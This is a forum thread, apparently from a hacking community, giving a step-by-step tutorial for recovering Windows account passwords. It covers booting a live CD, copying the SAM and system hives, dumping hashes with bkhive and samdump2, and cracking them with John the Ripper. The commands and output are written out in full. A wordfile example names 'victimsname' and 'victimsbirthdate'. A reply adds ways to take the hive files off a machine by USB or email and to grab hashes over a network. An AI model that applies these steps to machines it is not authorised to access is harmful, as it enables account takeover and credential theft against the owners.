Windows PWD Recovery... The OldSchool Way!

[Dark808]

Hi all,

Firstly, this is a HOWTO on getting a windows password with additional syskey-encryption. Recommended only for people who like to do things the hard and slow way. Second, you're doing this on your own behalf and don't use it wrong or visciously. Have fun (even though it is a very old way of doing it)!

Step 1: Boot Knoppix S-T-D and get access to windows:

Put your Knoppix S-T-D cd in your cd-rom and boot up your computer. Make sure that bios is set to boot the cd-rom.

First, we need some information on the system: (press ALT+F5 to open the shell in which we will type every command in)

cat /etc/fstab

This will output something like this:

proc       /proc       proc   defaults            0 0

pts        /dev/pts    devpts mode=0622           0 0

/dev/fd0   /mnt/auto/floppy auto   user,noauto,exec,umask=000    0 0

/dev/cdrom /mnt/auto/cdrom  auto   user,noauto,exec,ro 0 0



/dev/cdrom1 /mnt/auto/cdrom1  auto   users,noauto,exec,ro 0 0

# Added by KNOPPIX

/dev/hda1 /mnt/hda1 ntfs noauto,users,exec,ro,uid=knoppix,gid=knoppix 0 0

Remember that we want to get the windows logon password, so in the most cases you should look for a harddisc with the

NTFS filesystem.Take a look at the output above. You will see that there is a NTFS-harddisc the: '/dev/hda1'. To get

access to this drive you have to 'mount' it:

 mount -r /dev/hda1 /mnt/hda1

The drive 'hda1' is now located in '/mnt/hda1'. Note that you can't write to the NTFS-drive only read.

Step 2: Get information needed to crack the password:

Now that we have access to our selected windows-drive we need two files: the SAM and system file.

They are located in %WINDIR% / system32 / config:

cp /mnt/hda1/WINDOWS/system32/config/SAM SAM

cp /mnt/hda1/WINDOWS/system32/config/system system

The files are now copyied to your RAM (from which Knoppix S-T-D normally read/writes to).

The 'SAM' file contains the security accounts information of the system's users and the 'system' hive which has the

data to provide a bootkey for syskey (encryption method). The passwords in SAM is encrypted in MD5 and ontop of that

with the syskey encryption, which Microsoft calls a "complex obfuscation algorithm"..

Step 4: Use programs (Bkhive and Pwdump2) to obtain password hashes:

The programs are now installed and ready to be used.

First, we need to get the bootkey to get rid of the syskey decryption of our password hashes:

bkhive system bootkey

Second, we use the bootkey and SAM with samdump2 to generate our password hashes in a file:

samdump2 SAM bootkey > hashes

Step 5: Crack the passwords:

First of all note that the process of cracking a password can take hours even days if complex and long enough. However it can be done faster, but keep in mind that it differs. Also, there is many programs to use to crack passwords and we will use 'John'. John is preinstalled on the Knoppix S-T-D and is free to use. We say that 'Test' is a user on the windows-machine and that the password is 'KANDUSE' (I tried on my own computer with these informations).

Now to the cracking:

/etc/john/john -user:Test hashes

I got the following output:

Loaded 1 password (NT LM DES [24/32 4K])

KANDUSE          (Test:1)

guesses: 1  time: 0:00:14:26 (3)  c/s: 512664  trying: KHERCUL - KNDRROL

It took 14 minutes and 26 seconds to crack it on my computer, but it could just as well have lasted 3 minutes or 2 hours or more. Note that if there is more than one user on the computer you can as well exclude the '-user:Test' part if you want John to crack every password at once.

If you have some words that you would like it to check for first, we can use a 'wordfile'. A wordfile contains words to search for. Example of wordfile:

victimsname

victimsbirthdate

victimsaddress

... etc.

You only put one word on each line and you can set as many as you would like to.

Now we want to use the wordfile so we simply put in the parameter "-wordfile:filename". Like this:

/etc/john/john -wordfile:my_file password_file

This will speed up the process if you have some good ideas of what the password could be.

If you missed what the cracked password was you can use this command to request it:

/etc/john/john -show password_file

This will show something like this (I filtered it a bit):

[Username]:[Password]:(additional information here)



x password cracked, x left

It is also good to know that if john cracks a password longer than 8 chararacters it will break it into two parts. Like this:

Loaded x password (NT LM DES [24/32 4K])

12345678          (Test:1)

9                 (Test:2)

guesses: x  time: x:xx:xx:xx (x)  c/s:xxxx  trying: xxxxx - xxxxx

If you don't know the user names for the computer (and in the most cases you probrably don't) you can make 'chntpw' list them for you:

chntpw -l SAM

This will generate something like this:

chntpw version 0.99.1 030126, (c) Petter N Hagen

Hive's name (from header): <SystemRootSystem32ConfigSAM>

ROOT KEY at offset: 0x001020

Page at 0x9000 is not 'hbin', assuming file contains garbage at end

File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)

Used for data: 337/29520 blocks/bytes, unused: 11/2992 blocks/bytes.

Hello, this is SAM!

Failed logins before lockout is: 0

Minimum password length        : 0

Password history count         : 0

RID: 01f4, Username: <Administrator>

RID: 03f4, Username: <Test>



Hives that have changed:

 #  Name

None!

Above we used the user 'Test' and is located here in the output:

RID: 03f4, Username: <Test>

To show that a password cracking could take less time, we try setting a password on your Knoppix S-T-D to crack. Type:

passwd knoppix

The system now requests a password, type 1234. Then retype when asked.

Now we need to dump it to a file so it can be cracked and use John to do it:

/etc/john/unshadow /etc/passwd /etc/shadow > crack.this

/etc/john/john crack.this

This should not take that long because it is a very easy password to crack.

You will see an output much like this:

Loaded 1 password (Standard DES [24/32 4K])

1234             (knoppix)

guesses: 1  time: 0:00:00:00 100% (2)  c/s: 3024  trying: 12345 - robert

This is an approach on how to retrieve a password for windows.

I hope someone will find this easy enough to understand and helpful.

Remember!! Only use this if you i.e loose your own password or if you need to help your friend.[/code][/url]

[SomeoneE1se]

Knoppix STD is not working on my computer, So how would I do it? Should I use Cain/Able to grab the hashes and then use the rainbow tables created by the community? Or is there another way that doesn't require a linux distro that doesn't support half the hardware out there?

[Dark808]

Accualy this is only the old way i found of doing it. and yes you could use Cain do grab the hashes but then the compy would have to have cain installed on it. sometimes that is not desierable. This is how I would do it. I would boot up to slax. then just copy the entire sam and system file to a usb or email them. then take them to another computer and recover them using a rainbowtable.

(you can get slax at http://www.slax.org/ there is a module that you put into the cd when you burn it that will give you bkhive pwdump and john so you can crack the hashes if you want them email me "lucky.very.lucky@gmail.com" but you dont need those if your just getting the hashes/SAM file then you can just take the accual SAM and security file)

if you dont want to use linux. you can (i guess never tried) use Pwdump3 or 6 or 4 to get the hashes over a network.

but if you want to do it to a computer not on a network. you can use a program i found called SAMinside. just take the exe and put it in your usb stick, run the exe. and copy the hashes displayed on the screen(theres more to it but i'm too lazy to type it right now)

i would use rainbow tables but i have found. that everytime i try to download one it stops at like 2 gigs or somthin when left over night.